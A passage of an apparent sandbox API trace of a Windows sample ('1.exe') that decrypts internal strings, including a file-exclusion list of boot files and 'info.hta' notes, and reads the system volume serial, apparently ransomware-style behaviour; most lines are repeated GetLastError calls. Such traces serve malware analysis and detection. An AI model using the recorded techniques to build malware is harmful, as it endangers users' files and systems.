hKey=0xe926b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af4608, pdwDataLen=0xcff568 | out: pbData=0x2af4608, pdwDataLen=0xcff568) returned 1 [0035.084] CryptDestroyKey (hKey=0xe926b0) returned 1 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x84) returned 0x2af46a0 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x84) returned 0x2af4730 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af47c0 [0035.084] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff524, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff58c | out: phKey=0xcff58c*=0xe92870) returned 1 [0035.084] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0xcff574, dwFlags=0x0) returned 1 [0035.084] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af47c0, pdwDataLen=0xcff540 | out: pbData=0x2af47c0, pdwDataLen=0xcff540) returned 1 [0035.084] CryptDestroyKey (hKey=0xe92870) returned 1 [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af47c0 | out: hHeap=0x2af0000) returned 1 [0035.084] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x2af46a0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4730 | out: hHeap=0x2af0000) returned 1 [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4608 | out: hHeap=0x2af0000) returned 1 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af14f8 [0035.084] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff548, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5b0 | out: phKey=0xcff5b0*=0xe925b0) returned 1 [0035.084] CryptSetKeyParam (hKey=0xe925b0, dwParam=0x1, pbData=0xcff598, dwFlags=0x0) returned 1 [0035.084] CryptDecrypt (in: hKey=0xe925b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af14f8, pdwDataLen=0xcff564 | out: pbData=0x2af14f8, pdwDataLen=0xcff564) returned 1 [0035.084] CryptDestroyKey (hKey=0xe925b0) returned 1 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x18) returned 0x2af1520 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af4608 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af4730 [0035.084] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff520, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff588 | out: phKey=0xcff588*=0xe92270) returned 1 [0035.084] CryptSetKeyParam (hKey=0xe92270, dwParam=0x1, pbData=0xcff570, dwFlags=0x0) returned 1 [0035.084] CryptDecrypt (in: hKey=0xe92270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af4730, pdwDataLen=0xcff53c | out: pbData=0x2af4730, pdwDataLen=0xcff53c) returned 1 [0035.084] CryptDestroyKey (hKey=0xe92270) returned 1 [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4730 | out: hHeap=0x2af0000) returned 1 [0035.084] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x2af1520, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4608 | out: hHeap=0x2af0000) returned 1 [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af14f8 | out: hHeap=0x2af0000) returned 1 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af4730 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af4948 [0035.084] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af4948, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0035.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4948 | out: hHeap=0x2af0000) returned 1 [0035.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x174) returned 0x2af4948 [0035.084] GetLastError () returned 0x0 [0035.084] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.085] SetLastError (dwErrCode=0x0) [0035.085] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.086] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.087] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.088] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.089] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af4948, Size=0x38c) returned 0x2af4948 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.090] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.177] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.178] GetLastError () returned 0x0 [0035.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x86) returned 0x2af4608 [0035.179] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af4608, Size=0x92) returned 0x2af4ce0 [0035.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2af14f8 [0035.179] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff638 | out: phKey=0xcff638*=0xe92870) returned 1 [0035.179] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0xcff620, dwFlags=0x0) returned 1 [0035.179] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1220, pdwDataLen=0xcff5ec | out: pbData=0x2af1220, pdwDataLen=0xcff5ec) returned 1 [0035.179] CryptDestroyKey (hKey=0xe92870) returned 1 [0035.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1248 [0035.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1270 [0035.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af1370 [0035.179] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff610 | out: phKey=0xcff610*=0xe92430) returned 1 [0035.179] CryptSetKeyParam (hKey=0xe92430, dwParam=0x1, pbData=0xcff5f8, dwFlags=0x0) returned 1 [0035.179] CryptDecrypt (in: hKey=0xe92430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1370, pdwDataLen=0xcff5c4 | out: pbData=0x2af1370, pdwDataLen=0xcff5c4) returned 1 [0035.179] CryptDestroyKey (hKey=0xe92430) returned 1 [0035.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1370 | out: hHeap=0x2af0000) returned 1 [0035.179] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1248, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0035.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1270 | out: hHeap=0x2af0000) returned 1 [0035.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1220 | out: hHeap=0x2af0000) returned 1 [0035.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xcff678, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xcff678*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1248 | out: hHeap=0x2af0000) returned 1 [0035.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2af1220 [0035.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1520 [0035.180] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff61c | out: phKey=0xcff61c*=0xe926f0) returned 1 [0035.180] CryptSetKeyParam (hKey=0xe926f0, dwParam=0x1, pbData=0xcff604, dwFlags=0x0) returned 1 [0035.180] CryptDecrypt (in: hKey=0xe926f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1520, pdwDataLen=0xcff5d0 | out: pbData=0x2af1520, pdwDataLen=0xcff5d0) returned 1 [0035.180] CryptDestroyKey (hKey=0xe926f0) returned 1 [0035.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2af04a0 [0035.180] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff5ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff614 | out: phKey=0xcff614*=0xe92430) returned 1 [0035.180] CryptSetKeyParam (hKey=0xe92430, dwParam=0x1, pbData=0xcff5fc, dwFlags=0x0) returned 1 [0035.180] CryptDecrypt (in: hKey=0xe92430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04a0, pdwDataLen=0xcff5c8 | out: pbData=0x2af04a0, pdwDataLen=0xcff5c8) returned 1 [0035.180] CryptDestroyKey (hKey=0xe92430) returned 1 [0035.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x56) returned 0x2af0508 [0035.180] RtlReAllocateHeap (Heap=0x2af0000, Flags=0x0, Ptr=0x2af0508, Size=0xaa) returned 0x2af1370 [0035.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1250 [0035.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x180) returned 0x2af43e0 [0035.180] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff57c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5e4 | out: phKey=0xcff5e4*=0xe922b0) returned 1 [0035.180] CryptSetKeyParam (hKey=0xe922b0, dwParam=0x1, pbData=0xcff5cc, dwFlags=0x0) returned 1 [0035.181] CryptDecrypt (in: hKey=0xe922b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af43e0, pdwDataLen=0xcff598 | out: pbData=0x2af43e0, pdwDataLen=0xcff598) returned 1 [0035.181] CryptDestroyKey (hKey=0xe922b0) returned 1 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x220) returned 0x2af4568 [0035.181] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff574, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5dc | out: phKey=0xcff5dc*=0xe925b0) returned 1 [0035.181] CryptSetKeyParam (hKey=0xe925b0, dwParam=0x1, pbData=0xcff5c4, dwFlags=0x0) returned 1 [0035.181] CryptDecrypt (in: hKey=0xe925b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af4568, pdwDataLen=0xcff590 | out: pbData=0x2af4568, pdwDataLen=0xcff590) returned 1 [0035.181] CryptDestroyKey (hKey=0xe925b0) returned 1 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af0508 [0035.181] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff54c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5b4 | out: phKey=0xcff5b4*=0xe926b0) returned 1 [0035.181] CryptSetKeyParam (hKey=0xe926b0, dwParam=0x1, pbData=0xcff59c, dwFlags=0x0) returned 1 [0035.181] CryptDecrypt (in: hKey=0xe926b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af0508, pdwDataLen=0xcff568 | out: pbData=0x2af0508, pdwDataLen=0xcff568) returned 1 [0035.181] CryptDestroyKey (hKey=0xe926b0) returned 1 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x84) returned 0x2af1428 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x84) returned 0x2af4790 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af88b8 [0035.181] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff524, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff58c | out: phKey=0xcff58c*=0xe929b0) returned 1 [0035.181] CryptSetKeyParam (hKey=0xe929b0, dwParam=0x1, pbData=0xcff574, dwFlags=0x0) returned 1 [0035.181] CryptDecrypt (in: hKey=0xe929b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af88b8, pdwDataLen=0xcff540 | out: pbData=0x2af88b8, pdwDataLen=0xcff540) returned 1 [0035.181] CryptDestroyKey (hKey=0xe929b0) returned 1 [0035.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af88b8 | out: hHeap=0x2af0000) returned 1 [0035.181] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x2af1428, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0035.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af4790 | out: hHeap=0x2af0000) returned 1 [0035.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0508 | out: hHeap=0x2af0000) returned 1 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af1268 [0035.181] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff548, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff5b0 | out: phKey=0xcff5b0*=0xe92330) returned 1 [0035.181] CryptSetKeyParam (hKey=0xe92330, dwParam=0x1, pbData=0xcff598, dwFlags=0x0) returned 1 [0035.181] CryptDecrypt (in: hKey=0xe92330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1268, pdwDataLen=0xcff564 | out: pbData=0x2af1268, pdwDataLen=0xcff564) returned 1 [0035.181] CryptDestroyKey (hKey=0xe92330) returned 1 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x18) returned 0x2af14b8 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af14d8 [0035.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8528 [0035.181] CryptImportKey (in: hProv=0xe843e0, pbData=0xcff520, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcff588 | out: phKey=0xcff588*=0xe92430) returned 1 [0035.181] CryptSetKeyParam (hKey=0xe92430, dwParam=0x1, pbData=0xcff570, dwFlags=0x0) returned 1 [0035.181] CryptDecrypt (in: hKey=0xe92430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8528, pdwDataLen=0xcff53c | out: pbData=0x2af8528, pdwDataLen=0xcff53c) returned 1 [0035.182] CryptDestroyKey (hKey=0xe92430) returned 1 [0035.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8528 | out: hHeap=0x2af0000) returned 1 [0035.182] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x2af14b8, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0035.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af14d8 | out: hHeap=0x2af0000) returned 1 [0035.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1268 | out: hHeap=0x2af0000) returned 1 [0035.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af90b8 [0035.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af92d0 [0035.182] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af92d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0035.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af92d0 | out: hHeap=0x2af0000) returned 1 [0035.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x174) returned 0x2af4790 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.182] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.183] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] GetLastError () returned 0x0 [0035.184] 